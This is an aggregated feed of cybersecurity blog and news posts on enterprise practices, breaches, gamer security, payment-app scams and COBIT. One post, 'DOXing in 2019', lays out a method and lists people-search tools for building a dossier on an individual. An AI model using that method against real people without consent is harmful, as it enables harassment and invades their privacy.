When enterprises underestimate the damage cyberattacks, the propensity is to run towards shortcuts. This means being reactionary to attacks and not taking cybersecurity seriously by running the most basic of solutions and not investing too much time and energy. This is a recipe for disaster – cybersecurity is an extremely important function of an enterprise today and needs to be taken as seriously as any other function.

  1. Forgetting to have cybersecurity drills

Just like fire safety drills, it’s important to have regular cybersecurity drills. This inculcates preparedness into employees and gives them an idea of what happens during a cyberattack. But many organizations go for months and years without having one. This makes them extremely unprepared in the event of an actual cyber attack.

  1. Delayed patching and updating

Vulnerabilities in different enterprise software are often found every day and patches & updates are released to keep businesses safe from a cyber strike. But organizations can often be guilty of not being up-to-date on patching software for vulnerabilities. Hackers and cybercriminals are aware of this and often use these vulnerabilities to enter systems and cause immense chaos.

  1. Not investing in backup

An enterprise security framework goes a long way in enabling protection and strong solutions can also play a part. But it’s always important to have a fallback plan and that is where backup comes in. By backing up critical data at regular intervals, enterprises can ensure they have something to fall back on, in case of critical situations. However, many enterprises neglect this important step and as a result, put themselves at great risk in the event of unforeseen circumstances.

  1. Underestimating social engineering

Many enterprises can slip into the notion that cybersecurity is purely a technological problem and putting in place, a strong cybersecurity solution can solve all problems. But that is not the case – social engineering is as big an issue as cybersecurity, nowadays. The only way to solve this is to ensure that employees are as well- versed in cybersecurity issues.

  1. The problem with access control

Access control is an issue almost every organization struggles with. They may have the strongest firewalls but it can be sometimes of no use if every user in the organization has access to everything. That makes the company very susceptible to insider breaches. This also means that, if a hacker manages to gain control of a system with access to the network he can break the entire IT infrastructure.

Seqrite’s Unified Threat Management (UTM) provides a one-stop solution for many of the problems identified above. It acts as the first line of defence providing IT security management, a safe working environment, high productivity, regulatory compliance in a cost-effective way.

The post Eight great habits that enterprises can practice for bolstering cybersecurity appeared first on Seqrite Blog.

How organizations view and manage cyber risk

Amid a wider range of issues to handle, a majority of board members and senior executives responsible for their organization’s cyber risk management had less than a day in the last year to spend focused on cyber risk issues, the 2019 Marsh Microsoft Global Cyber Risk Perception Survey results have revealed. This lack of time for senior leaders to focus on cyber risk comes as concern over cyber threats hits an all-time high, and as … More

The post How organizations view and manage cyber risk appeared first on Help Net Security.

Chapter Preview: It All Starts with Your Personal Data Lake

Once, not long ago, data was nestled in paper files or stored on isolated computer networks, housed in glassed-off, air-conditioned rooms. Now, data is digital, moves effortlessly, and gets accessed from devices and places around the world at breakneck speeds. This makes it possible for businesses, organizations, and even individuals to collect and analyze this data for a whole host of purposes, such as advertising, insurance proposals, and scientific research, to name but a few. The data they are collecting and accessing about you is part of your personal data lake.

Data lake is a term that technologists typically use, but for us, using the term paints a strong visual for an important concept—how we create an extraordinary amount of data simply by going online and using connected devices. Your online interactions create drops of data that collect into streams, and pool together to form an ever-deepening lake of data over time. It stands to reason that the more time you spend online, connecting devices in your home and accessing a growing number of applications on your smartphone, the more quickly your personal data lake grows.

As you can imagine, your privacy and security are what’s at stake as you go about your digital life. Ultimately, the more data you share, either knowingly or unknowingly, the more that data potentially puts you at risk. This is true for you and your family members. The stakes get even higher because some of our own behavior can put us at risk. The internet is a platform with a global reach and a forever memory. What you say, do, and post can have a lifetime of implications. As a family, each member has a personal responsibility to look after themselves and each other. This unwritten contract extends to the internet because our actions there can impact our personal and professional lives, not to mention the lives of others. This book is laden with examples of how people get passed over for jobs, ruin romantic relationships, and end up doing actual physical harm to others because of what they say, do, or post online, ranging from sharing a picture of someone passed out at a party because it seemed funny at the time, to something calculated and intentionally injurious, like cyberbullying.

With people admitting that they increasingly spend more time online while connecting more and more devices in our homes, it’s time to understand the permanence of those behaviors and how they can impact all aspects of your life. As you go through the book you’ll better understand how your personal data lake is constantly growing, while laying out useful tips you can use to better manage your information.

Gary Davis’ book, Is Your Digital Front Door Unlocked?, is available September 5, 2019 and can be ordered at amazon.com.

The post Chapter Preview: It All Starts with Your Personal Data Lake appeared first on McAfee Blogs.

What Is Advanced Threat Protection?

Advanced Threat Protection, or ATP, is a type of security solution specifically designed to defend a network or system from sophisticated hacking or malware attacks that target sensitive data. ATP is usually available as a software or managed security service. Advanced Threat Protection solutions differ in terms of approach and components, but most include endpoint agents, email gateways, network devices, malware protection systems, and a centralized management console in order to manage defenses and correlate alerts.

How Advanced Threat Protection Works

Advanced Threat Protection has three primary objectives:

  1. Detecting threats before they have any opportunity to access critical data or breach any system.
  2. Having adequate protection to defend against any and all detected threats.
  3. Responding to and mitigating threats and other security events.

In order to achieve this, there are several components that are important to Advanced Threat Protection solutions. These include:

Real-Time Visibility

Having real-time visibility with whatever is happening allows threats to be detected before they do any damage.

Context

Threat alerts should contain context for true security efficiency. This allows the security teams to prioritize threats and organize a proper response.

Data Awareness

There is a need for Advanced Threat Protection to have a deep understanding of enterprise data, its sensitivity, value, and other factors contributing to the formulation of a proper response.

After a threat is detected, analysis on what happened is needed. Advanced Threat Protection teams typically handle the threat analysis, which enables the enterprise to continue business as usual while monitoring, analysis, and response happens behind the scenes. Threats are then prioritized based on their potential to cause damage and the data at risk. Advanced Threat Protection should be able to address three key areas:

  1. Stopping attacks in progress or mitigating the threats before they are able to breach the system.
  2. Disrupting the activity or countering the actions that have been done by a breach.
  3. Interrupting the lifecycle of the attack and ensuring that the threat is unable to proceed.

Benefits of Advanced Threat Protection Services

The main benefit of having Advanced Threat Protection service is to be able to prevent, detect, and respond to any sophisticated or new types of attacks designed to pass traditional security solutions like firewalls, IPS/IDS, and antivirus software. As attacks continue to become targeted and persistent, Advanced Threat Protection solutions provide a proactive approach to security in identifying and removing threats before any data is compromised.

Advanced Threat Protection solutions provide access to a global community of professionals dedicated to cybersecurity. This allows for sharing and augmenting threat intelligence and analysis using information from third parties, which in turn, allows for fast and easy updating of defenses against new threats detected by the global community.

Organizations that use Advanced Threat Protection are better prepared to detect threats and remove them in order to minimize the damage. A good provider focuses on the lifecycle of attacks to manage threats in real time. They also notify the organization regarding attacks that have occurred and what happened due to them and how they were stopped.

Either managed within the organization or offered as a service, Advanced Threat Protection solutions provide critical defense against major and potentially damaging attacks.

Also Read,

Microsoft’s Windows 7, 8.1 To Have Defender Advanced Threat Protection

Advanced Persistent Threat: What You Need to Know

Google’s Advanced Protection Program For Cloud Services Released As Beta

The post What Is Advanced Threat Protection? appeared first on .

SLAs: What your cybersecurity vendor isn’t telling you

Service Level Agreements (SLAs) have been used in the IT world for many years as a contractual mechanism for holding service providers accountable and extracting defined payments and penalties when they mess up. Likewise, vendors have used SLAs to put their “money where their mouth is” in terms of fulfilling value promises and establishing important metrics for their customers. In reality, SLAs have not kept up with either of these purposes. For most IT pros, … More

The post SLAs: What your cybersecurity vendor isn’t telling you appeared first on Help Net Security.

Businesses need to treat cybersecurity as something that crosses organizational boundaries

Companies are working to balance their desire for new innovations with their need for strong cyber-defenses, according to a new report from CompTIA. CompTIA’s “Cybersecurity for Digital Operations,” based on a survey of 500 U.S. businesses, also reveals that company executives, business staff and technology professionals have distinctly different views on where their organization stands when it comes to cyber-readiness. The stakes have never been higher for business operations, and public and private safety, according … More

The post Businesses need to treat cybersecurity as something that crosses organizational boundaries appeared first on Help Net Security.

The use of open source software in DevOps has become strategic for organizations of all sizes

A higher percentage of top performing teams in enterprise organizations are using open source software, according to a survey conducted by DevOps Research and Assessment (DORA) and Google Cloud. Additionally, the proportion of Elite performers (highest performing teams) nearly tripled from last year, showing that DevOps capabilities are driving performance. These findings reflect organizations’ increased willingness to embrace investments in technology to deliver value and the use of open source – even in highly regulated, … More

The post The use of open source software in DevOps has become strategic for organizations of all sizes appeared first on Help Net Security.

Improving the security, privacy and safety of future connected vehicles

The security, privacy and safety of connected autonomous vehicles (CAVs) has been improved thanks to testing at WMG, University of Warwick. CAVs can now connect to each other, roadside infrastructure, and roadside infrastructure to each other more securely. In the near future connected and autonomous vehicles are expected to become widely used across the UK. To ensure a smooth deployment, researchers from WMG, University of Warwick undertook real-world testing of four academic innovations in the … More

The post Improving the security, privacy and safety of future connected vehicles appeared first on Help Net Security.

Benefits and Best Practices of Adaptive Security

The DevOps environment has been changing rapidly, and adaptive security has become a widely used response to this. The main purpose of adaptive security is to create layers of security providing threat detection, visibility, and prevention that continue to evolve and become better.

History of Adaptive Security

The term “Adaptive Security Architecture” was created in 2008 by Sun Microsystems, which was acquired by Oracle in 2010. It was designed to anticipate and respond to threats, all while reducing threat amplification, velocity, attack surface, and the recovery time. This is an architectural model that imitates a biological immune system from a microscopic level.

Biological systems are designed to respond to changing conditions and adapt. They are able to respond to threats in a dynamic way, which mimics the involuntary immune system response. These systems are made of several components that are not dependent on one entity in order to survive.

Defining Adaptive Security

Adaptive security is a type of security mode that monitors threats continuously and improves as threats change and evolve. With traditional security methods, organizations use firewalls, intrusion defense systems (IDS), antivirus software, and intrusion prevention systems (IPS). In truth, while they are a powerful defense, they are no longer enough. Environments are no longer static, and security systems should be integrated within continuous deployment IT.

Adaptive Security Benefits

The main benefit of adaptive security is for early detection of threats and an automatic and autonomous response for any malicious event. Other benefits include:

  • Containing threats when they occur.
  • Preventing the theft and sabotage of data.
  • Reducing time dwelled on threats.
  • Stopping the spread of a pandemic.
  • Recognizing ongoing security breaches.
  • Avoiding a monoculture systems environment.

Adaptive security is designed to evolve and be more complex in order to defend against evolving security threats.

Best Practices of Adaptive Security

There are four stages in adaptive security architecture:

  1. Predict: To assess the risk and anticipate malware and attacks, then implement the baseline systems.
  2. Prevent: To isolate and harden systems, thus preventing security breaches.
  3. Respond: Investigating incidents and designing policy changes, plus conducting a retrospective analysis.
  4. Defect: Prioritizing risks and defects and learning how to contain threats and incidents.

Combining these four stages creates a system with the ability to respond to suspect behaviors.

Adaptive Security Solutions

For an effective adaptive security system, they require a robust solution that incorporates different features and measures to predict threats and ensure a comprehensive network, as well as endpoint protection.

A proactive approach to security enables organizations to adapt to ever-changing threats. And this is exactly what adaptive security provides.

Also Read,

Importance of Security Analytics

The Biggest Malware Threats To Businesses in 2019

Threats and Security Solutions for IIoT

The post Benefits and Best Practices of Adaptive Security appeared first on .

Security is slowly becoming essential to doing business

A veteran of the information security industry, Greg Jensen has spent the last six years at Oracle as the Senior Director of Oracle’s Cloud Security solutions. He’s also the Senior Editor of the Oracle and KPMG Cloud Threat Report, as well as Oracle’s annual CISO Report. “The focus of these efforts is to understand the key challenges that hundreds of global organizations are struggling with as they lift and shift workloads to the cloud, and … More

The post Security is slowly becoming essential to doing business appeared first on Help Net Security.

Confidential data of 24.3 million patients discovered online

Greenbone Networks has released details of new research in to the security of the servers used by health providers across the world to store images of X-rays as well as CT, MRI and other medical scans. Of the 2,300 medical image archive systems worldwide that Greenbone analyzed between mid-July and early September 2019, 590 of them were freely accessible on the internet, together containing 24.3 million data records from patients located in 52 different countries. … More

The post Confidential data of 24.3 million patients discovered online appeared first on Help Net Security.

Businesses facing post breach financial fallout by losing customer trust

44% of Americans, 38% of Brits, 33% of Australians, and 37% of Canadians have been the victim of a data breach, according to newly released research conducted by PCI Pal. The findings suggest that a combination of recent high-profile data breaches in each region, the development of assorted laws and regulations to protect consumer data privacy (e.g. the California Consumer Privacy Act, Europe’s General Data Protection Regulations, Canada’s Personal Information Protection and Electronic Documents Act, … More

The post Businesses facing post breach financial fallout by losing customer trust appeared first on Help Net Security.

Solving the Gamer’s Dilemma: Security vs. Performance

As of last year, 2.2 billion1 people consider themselves gamers across the globe. Of that 2.2 billion, over 50% – 1.22 billion2 – play their game of choice on a PC. The sheer number of PC gamers throughout the world, however, has sparked the interest of cybercriminals and cyberthreats targeting gamers have spiked. Threats including malware, potentially unwanted programs (PUPs), phishing, account takeovers (ATO), and more have slowly started to permeate gamers’ domains at an alarming level.

PC gamers often adopt lesser security protocols, as they’re concerned about the potential negative impact on in-game performance. At the same time, they are the most connected, online users, meaning their exposure to threats is generally higher. While they recognize and understand the importance of having cybersecurity, they do not want to sacrifice performance for security. The gamer’s dilemma – security versus performance – is the crux as to why gamers put security second, even though the average gamer has experienced almost five cyberattacks.

There’s good news though – McAfee Gamer Security is here to counter the notion that antivirus slows gamers down. This brand-new security solution from McAfee provides gamers with the security they need without sacrificing performance or creating in-game slowdowns, such as drops in frames per second (FPS) and lag. Built from the ground up, this solution delivers performance optimization by monitoring key system metrics coupled with the ability to manually kill resource hogs on-the-fly, while automatically prioritizing resources and pausing background services. McAfee Gamer Security also features cloud-based MicroAV, which offloads detection from the system to the cloud for all the protection gamers could want or need, without the “bloat” that usually accompanies security software.

While McAfee Gamer Security is now available for purchase, in spring 2019 McAfee surveyed users that participated in beta testing. Here’s how they responded to a few questions we asked:

Overall, what impact, if any, did you feel in your gaming experience?

“I believe I had [experienced] a positive impact of the software during my overall use of the program because it increased the speed of my game as well as gave me peace of mind that I…[stayed] protected during my gameplay.”

What one benefit would make you talk about McAfee Gamer Security to your friends? What is the primary reason for your choice? 

“Good security which doesn’t slow down my system; Normally, antiviruses…hog background resources [and] you trade performance for security. McAfee Gamer Security offers the best of both worlds, without contradicting each other.”

Overall, how useful or not useful has Gamer Security been?                      

“Every couple [of] hours or so while gaming, I…used the software to check up on my RAM/GPU/CPU performance and make sure my system isn’t bottlenecking, there aren’t any irregularities, etc. I also really like that I can experience a boost in my gameplay without having to take the risk of overclocking my components.”

In addition to using a security solution like McAfee Gamer Security, here are some other general tips to help you stay secure while playing your favorite video game:

  1. Ensure all applications, hardware and software are up-to-date. Cybercriminals can take advantage of software, hardware, and application vulnerabilities to spread cyberthreats, such as malware. Keep your devices and applications updated with the latest security patches and fixes to help combat this threat.
  2. Periodically visit your device to add/remove programs. Some apps on your device may be vampirically siphoning in-game performance. Remove apps that you do not need or no longer use.
  3. Create strong, unique passwords. Over 55% of gamers re-use the same password across accounts for online gaming services. And while it might be easier to remember the same password, reusing credentials across multiple accounts could put the hundreds, or even thousands, of invested hours in leveling up characters and gathering rare items at risk in the event one account is breached. Be sure to construct a complex password that is difficult to guess.

And, as always, stay on top of the latest consumer and gaming security threats with @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

Footnotes

  1. Number of active video gamers worldwide from 2014 to 2021 (in millions), Statista, 2019
  2. Number of active PC gamers worldwide from 2014 to 2021 (in millions), Statista, 2019

The post Solving the Gamer’s Dilemma: Security vs. Performance appeared first on McAfee Blogs.

WhatsApp ‘Delete for Everyone’ Doesn’t Delete Media Files Sent to iPhone Users

Mistakenly sent a picture to someone via WhatsApp that you shouldn't have? Well, we've all been there, but what's more unfortunate is that the 'Delete for Everyone' feature WhatsApp introduced two years ago contains an unpatched privacy bug, leaving its users with false sense of privacy. WhatsApp and its rival Telegram messenger offer "Delete for Everyone," a potentially life-saving feature

Targeted threat intelligence and what your organization might be missing

In this Help Net Security podcast recorded at Black Hat USA 2019, Adam Darrah (Director of Intelligence), Mike Kirschner (Chief Operating Officer) and Christian Lees (Chief Technology Officer) from Vigilate, talk about how their global threat hunting and dark web cyber intelligence research team extends the reach of a company’s security resources, and lives within the underground community to remain ahead of emerging threats. Where many other solutions rely on machine learning (ML) to access … More

The post Targeted threat intelligence and what your organization might be missing appeared first on Help Net Security.

Researchers uncover 125 vulnerabilities across 13 routers and NAS devices

In a cybersecurity study of network attached storage (NAS) systems and routers, Independent Security Evaluators (ISE) found 125 vulnerabilities in 13 IoT devices, reaffirming an industrywide problem of a lack of basic security diligence. The vulnerabilities discovered in the SOHOpelessly Broken 2.0 research likely affect millions of IoT devices. “Our results show that businesses and homes are still vulnerable to exploits that can result in significant damage,” says lead ISE researcher Rick Ramgattie. “These issues … More

The post Researchers uncover 125 vulnerabilities across 13 routers and NAS devices appeared first on Help Net Security.

Phishing attacks up, especially against SaaS and webmail services

Phishing attacks continued to rise into the summer of 2019 with cybercrime gangs’ focus on branded webmail and SaaS providers remaining very keen, according to the APWG report. The report also documents how criminals are increasingly perpetrating business email compromise (BEC) attacks by using gift card cash-out schemes. The number of phishing attacks observed in the second quarter of 2019 eclipsed the number seen in the three quarters before. The total number of phishing sites … More

The post Phishing attacks up, especially against SaaS and webmail services appeared first on Help Net Security.

DOXing in 2019

During the early 2000s in private chats or even in public IRC channels, self-styled “hackers” used to DOX people in order to prove their competence in “dark arts” (cit. Proceedings of the 39th SIGCSE). I always was fascinated by those guys that with few information such as an email address or a nickname were able to find out much of your entire life just looking on the web. Today, after several years a friend of mine asked me to start a DOX session against himself in order to evaluate what ‘Internet’ knows about him.

What is DOX ?

“Doxing” is a neologism that has evolved over its brief history. It comes from a spelling alteration of the abbreviation “docs” (for “documents”) and refers to “compiling and releasing a dossier of personal information on someone”. Essentially, doxing is revealing and publicizing records of an individual, which were previously private or difficult to obtain.

The term dox derives from the slang “dropping dox” which, according to Wired writer Mat Honan, was “an old-school revenge tactic that emerged from hacker culture in 1990s”. Hackers operating outside the law in that era used the breach of an opponent’s anonymity as a means to expose opponents to harassment or legal repercussions.

wikipedia: about DOXing

Nowadays the word DOX or the action to DOX someone gets a bad flavor since it undermines the victim privacy by publicly exposing sensitive data that the DOXer (aka who is performing the DOXing action) has collected and/or correlated. I will not expose any data but I’ll get the chance to review techniques and tools in order to give to my readers an updated view of DOXing tools in 2019.

DOXing methodology

When you start a DOXing session you might decide to play it by ear or to approach the problem with a methodology. Methodologies are not simple at this point since you need to map a back-to-forward and vice-versa information flow. In other words you need to forecast victim’s information that you might get from a victim’s peer or from a victim’s relative, so you need to be able to move from one peer to another one and to stop when you are moving far from the original victim. The feeling that stops you in getting too faraway from the original victim is something quite hard to define, we might decide to use an information threshold such as: after [random number] of iteration, or for example, only on public social profiles, or again getting deeper by defining everything is not involving another entity. Everything we define could be over-killing or restricting in the same way. So my best advise is to follow the path until you feel you are getting too far for your target, at that point wrap back information and start to focus on another way. The following image shows a simple flow that you might decide to take.

Simplified DOXing Flow

A simple but yet useful advise would be to take note to every finding coming from both: manual analysis and automatic analysis. It could sound as trivial suggestion, but I’m sure you will appreciate it once you will get hands dirty on such amount of data you might spot ! I’m used to Maltego, since it automates many searching steps, but there are many great tools out there, find your best fit and keep note of what you do !

Example from Maltego Blog

Used Tools

Fortunately there are a lot of tools for OSINT/Personal-INT which would be great to use. In the following list I’ve just selected some of them, the ones I personally think would get better results in 2019.

  • Doxing (by Hacking Live). It’s not super updated, but hey… Doxing is an ancient practice ! It works quite well and helps to automate many searches.
  • DoxTracker (by Kuro-Code). It would definitely help your automation searches since it includes many tracking web sites.
  • Maltego (by Paterva). Well maybe it’s the king of public information gathering, depending on how many services you will sign-in (Services are information sources) it extracts tons of information on your target.
  • FOCA (by Elevenpaths). FOCA (github) is another great and well-known software that allows you to automate many finding tasks. Unfortunately it runs only on a Windows machine, so if you are Unix/FreeBSD user you need to emulate a Windows OS.
  • FamilyTree. Is a great tool to try with. If you are lucky and your target is inside their DB, oh boy, you’ll get out tons of information to his relatives.
  • TruePeopleSearch. Very useful to find out address and/or phone numbers. It mainly works on US though.
  • PeekYou. It works great by searching on various sources including social networks and phone books. It works independently from the target states
  • Lullar. Another great social aggregation profiler. You can insert first and last name, nickname or the target email, it will check if the target is on socials and will provide you direct link to target social profile.
  • CheckUserNames. Sometimes you want to check if specific usernames exist on social networks. If this is your need CheckUserNames works great.
  • TinEye, Google Image Search, When you start to investigate pictures you could need to locate a specific picture, to do that you might want to find out similar pictures and seeking for comments/tags into similar pictures in order to locate the original picture.
  • Git-Fingerprint. Sometimes your target knows GIT and he might be using it.
  • PictaME. If you need to analyze Instagram profiles and or to check Instagram pictures without an Instagram account

It would be obvious, I know … but don’t forget Google searches. Automatic searches are great since speed you up, but Google and Bing! own a lot of information on your target. My best findings come from manual searches on google by correlating social comments and images.

This activity produced an acclaimed newspaper article on Scienze “La Repubblica” (Biggest Italian Newspaper) on 12 September 2019.

Scienze “La Repubblica” 12 Settembre 2019

CISO do’s and don’ts: Lessons learned

Keeping a business safe from cyber threats while allowing it to thrive is every CISO’s goal. The task is not easy: a CISO has to keep many balls in the air while being buffeted by an increasingly complex and always shifting threat landscape. Consequently, the importance of a good CISO should not be underestimated. Mistakes to avoid, practices to implement Francesco Cipollone, CISO and director at UK-based cybersecurity consultancy NSC42, says that he has seen … More

The post CISO do’s and don’ts: Lessons learned appeared first on Help Net Security.

Threat visibility is imperative, but it’s even more essential to act

Cyberthreats are escalating faster than many organizations can identify, block and mitigate them. Visibility into the expanding threat landscape is imperative, but according to a new threat report released by CenturyLink, it is even more essential to act. “As companies focus on digital innovation, they are entering a world of unprecedented threat and risk,” said Mike Benjamin, head of CenturyLink’s threat research and operations division, Black Lotus Labs. “Threats continue to evolve, as do bad … More

The post Threat visibility is imperative, but it’s even more essential to act appeared first on Help Net Security.

Four in five businesses need ways to better secure data without slowing innovation

While data loss protection is critical to Zero Trust (ZT), fewer than one in five organizations report their data loss prevention solutions provide transformational benefits and more than 80 percent say they need a better way to secure data without slowing down innovation, according to Code42. ZT architectures are based on the principle of “trust no one, verify everything,” abolishing the idea of a trusted network within a data security perimeter and requiring companies to … More

The post Four in five businesses need ways to better secure data without slowing innovation appeared first on Help Net Security.

Exploitation of IoT devices and Windows SMB attacks continue to escalate

Cybercriminals upped the intensity of IoT and SMB-related attacks in the first half of 2019, according to a new F-Secure report. The report underscores the threats IoT devices face if not properly secured when online, as well as the continued popularity of Eternal Blue and related exploits two years after WannaCry. F-Secure’s honeypots – decoy servers that are set up to lure in attackers for the purpose of collecting information – measured a twelvefold increase … More

The post Exploitation of IoT devices and Windows SMB attacks continue to escalate appeared first on Help Net Security.

Are Cash Transfer Apps Safe to Use? Here’s What Your Family Needs to Know

cash appsI can’t recall the last time I gave my teenage daughter cash for anything. If she needs money for gas, I Venmo it. A Taco Bell study break with the roommates? No problem. With one click, I transfer money from my Venmo account to hers. She uses a Venmo credit card to make her purchase. To this mom, cash apps may be the best thing to happen to parenting since location tracking became possible. But as convenient as these apps may be, are they safe for your family to use?

How do they work?

The research company, eMarketer, estimates that 96.0 million people used Peer-to-Peer (P2P) payment services this year (that’s 40.4% of all mobile phone users), up from an estimated 82.5 million last year.

P2P technology allows you to create a profile on a transfer app and link your bank account or credit card to it. Once your banking information is set up, you can locate another person’s account on the app (or invite someone to the app) and transfer funds instantly into their P2P account (without the hassle of getting a bank account number, email, or phone number). That person can leave the money in their app account, move it into his or her bank account, or use a debit card issued by the P2P app to use the funds immediately. If the app offers a credit card (like Venmo does), the recipient can use the Venmo card like a credit card at retailers most anywhere. 

Some of the more popular P2P apps include Venmo, Cash App, Zelle, Apple Pay, Google Wallet, PayPal.me, Facebook Messenger, and Snapcash, among others. Because of the P2P platform’s rapid growth, more and more investors are entering the market each day to introduce new cash apps, which is causing many analysts to speculate on need for paper check transactions in the future.

Are they safe?

While sending your hard-earned money back and forth through cyberspace on an app doesn’t sound safe, in general, it is. Are there some exceptions? Always. 

Online scam trends often follow consumer purchasing trends and, right now, the hot transaction spot is P2P platforms. Because P2P money is transferred instantly (and irreversibly), scammers exploit this and are figuring out how to take people’s money. After getting a P2P payment, scammers then delete their accounts and disappear — instantly

In 2018 Consumer Reports (CR) compared the potential financial and privacy risks of five mobile P2P services with a focus on payment authentication and data privacy. CR found all the apps had acceptable encryption but some were dinged for not clearly explaining how they protected user data. The consumer advocacy group ranked app safety strength in this order: Apple Pay, Venmo, Cash App, Facebook Messenger, and Zelle. CR also noted they “found nothing to suggest that using these products would threaten the security of your financial and personal data.”

While any app’s architecture may be deemed safe, no app user is immune from scams, which is where app safety can make every difference. If your family uses P2P apps regularly, confirm each user understands the potential risks. Here are just a few of the schemes that have been connected to P2P apps.

cash apps

Potential scams

Fraudulent sellers. This scam targets an unassuming buyer who sends money through a P2P app to purchase an item from someone they met online. The friendly seller casually suggests the buyer “just Venmo or Cash App me.” The buyer sends the money, but the item is never received, and the seller vanishes. This scam has been known to happen in online marketplaces and other trading sites and apps.

Malicious emails. Another scam is sending people an email telling them that someone has deposited money in their P2P account. They are prompted to click a link to go directly to the app, but instead, the malicious link downloads malware onto the person’s phone or computer. The scammer can then glean personal information from the person’s devices. To avoid a malware attack, consider installing comprehensive security software on your family’s computers and devices.

Ticket scams. Beware of anyone selling concert or sporting event tickets online. Buyers can get caught up in the excitement of scoring tickets for their favorite events, send the money via a P2P app, but the seller leaves them empty-handed.

Puppy and romance scams. In this cruel scam, a pet lover falls in love with a photo of a puppy online, uses a P2P app to pay for it, and the seller deletes his or her account and disappears. Likewise, catfish scammers gain someone’s trust. As the romantic relationship grows, the fraudulent person eventually asks to borrow money. The victim sends money using a P2P app only to have their love interest end all communication and vanish.  

P2P safety: Talking points for families

Only connect with family and friends. When using cash apps, only exchange money with people you know. Unlike an insured bank, P2P apps do not refund the money you’ve paid out accidentally or in a scam scenario. P2P apps hold users 100% responsible for transfers. 

Verify details of each transfer. The sender is responsible for funds, even in the case of an accidental transfer. So, if you are paying Joe Smith your half of the rent, be sure you select the correct Joe Smith, (not Joe Smith_1, or Joe Smithe) before you hit send. There could be dozens of name variations to choose from in an app’s directory. Also, verify with your bank that each P2P transaction registers.

Avoid public Wi-Fi transfers. Public Wi-Fi is susceptible to hackers trying to access valuable financial and personal information. For this reason, only use a secure, private Wi-Fi network when using a P2P payment app. If you must use public Wi-Fi, consider using a Virtual Private Network (VPN).

cash apps

Don’t use P2P apps for business. P2P apps are designed to be used between friends and include no-commercial-use clauses in their policies. For larger business transactions such as buying and selling goods or services use apps like PayPal. 

Lock your app. When you have a P2P app on your phone, it’s like carrying cash. If someone steals your phone, they can go into an unlocked P2P app and send themselves money from your bank account. Set up extra security on your app. Most apps offer PINs, fingerprint IDs, and two-factor authentication. Also, always lock your device home screen.

Adjust privacy settings. Venmo includes a feed that auto shares when users exchange funds, much like a social media feed. To avoid a stranger seeing that you paid a friend for Ed Sheeran tickets (and won’t be home that night), be sure to adjust your privacy settings. 

Read disclosures. One way to assess an app’s safety is to read its disclosures. How does the app protect your privacy and security? How does the app use your data? What is the app’s error-resolution policy? Feel secure with the app you choose.

We’ve learned that the most significant factor in determining an app’s safety comes back to the person using it. If your family loves using P2P apps, be sure to take the time to discuss the responsibility that comes with exchanging cash through apps. 

The post Are Cash Transfer Apps Safe to Use? Here’s What Your Family Needs to Know appeared first on McAfee Blogs.

The rise of modern applications, DevSecOps and the intelligence economy

There has been a significant year-over-year growth in enterprise usage trends around multi-cloud adoption, open source technologies such as Kubernetes, and AWS cloud-native services adoption, Sumo Logic report reveals. The research also shows the increasing need for cloud-based security solutions such as cloud SIEM to help enterprises address today’s increasingly complex security landscape. The intelligence economy The report also provides a summary of three major trends shaping digital business today: the rise of modern applications, … More

The post The rise of modern applications, DevSecOps and the intelligence economy appeared first on Help Net Security.

Security leaders lack confidence in the supply chain, fear third-party attacks

An overwhelming number of cybersecurity professionals (89%) have expressed concerns about the third-party managed service providers (MSPs) they partner with being hacked, according to new research from the Neustar International Security Council. Survey participants in July 2019 comprise 314 professionals from across six EMEA and US markets. While most organizations reported working with an average of two to three MSPs, less than a quarter (24%) admitted to feeling very confident in the safety barriers they … More

The post Security leaders lack confidence in the supply chain, fear third-party attacks appeared first on Help Net Security.

Interacting with governments in the digital age: What do citizens think?

Most U.S. citizens acknowledge and accept that state and local government agencies share their personal data, even when it comes to personal information such as criminal records and income data, according to a new survey conducted by YouGov and sponsored by Unisys. However, the survey found they remain concerned about the security of the data. The survey of nearly 2,000 (1,986) U.S. citizens living in eight states found that more than three-quarters (77%) accept that … More

The post Interacting with governments in the digital age: What do citizens think? appeared first on Help Net Security.

Cyber risk assessment of U.S. election commissions finds critical areas for improvement

Many election commissions are focused on quickly adapting and updating their cybersecurity; however, commissions still need to dedicate resources to updating outdated operating systems and protecting their email domains from being spoofed, according to NormShield. The report, which examined more than 100 items, focused on the broader picture — the internet facing infrastructure that supports state election processes. NormShield conducted two risk assessments (July and August) of 56 election commissions and Secretaries of State (SoS) … More

The post Cyber risk assessment of U.S. election commissions finds critical areas for improvement appeared first on Help Net Security.

Millions of Car Buyer Records Exposed: How to Bring This Breach to a Halt

Buying a car can be quite a process and requires a lot of time, energy, and research. What most potential car buyers don’t expect is to have their data exposed for all to see. But according to Threatpost, this story rings true for many prospective buyers. Over 198 million records containing personal, loan, and financial information on prospective car buyers were recently leaked due to a database that was left without password protection.

The database belonged to Dealer Leads, a company that gathers information on prospective buyers through a network of targeted websites. These targeted websites provide car-buying research information and classified ads for visitors, allowing Dealer Leads to collect this information and send it to franchise and independent car dealerships to be used as sales leads. The information collected included records with names, email addresses, phone numbers, physical addresses, IP addresses, and other sensitive or personally identifiable information – 413GB worth of this data, to be exact. What’s more, the exposed database contained ports, pathways, and storage info that cybercriminals could exploit to access Dealer Lead’s deeper digital network.

Although the database has been closed off to the public, it is unclear how long it was left exposed. And while it’s crucial for organizations to hold data privacy to the utmost importance, there are plenty of things users can do to help safeguard their data. Check out the following tips to help you stay secure:

  • Be vigilant about checking your accounts. If you suspect that your data has been compromised, frequently check your accounts for unusual activity. This will help you stop fraudulent activity in its tracks.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Consider using identity theft protection. A solution like McAfee Identify Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

And, as always, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Millions of Car Buyer Records Exposed: How to Bring This Breach to a Halt appeared first on McAfee Blogs.

What is the COBIT and why you need to know about it

Business processes today are largely dictated by the technology around them. Cloud computing, big data, and social media are just a few technologies that shape and affect a business as they generate huge amounts of data. This can be used to get ahead of the competition, but it also creates challenges in terms of governance and management. This is where the COBIT comes into play.

Defining Control Objectives for Information and Related Technologies

The Control Objectives for Information and Related Technologies, or more commonly known as the COBIT, was designed to help organizations and businesses implement, monitor, develop, and improve their information management and IT governance.

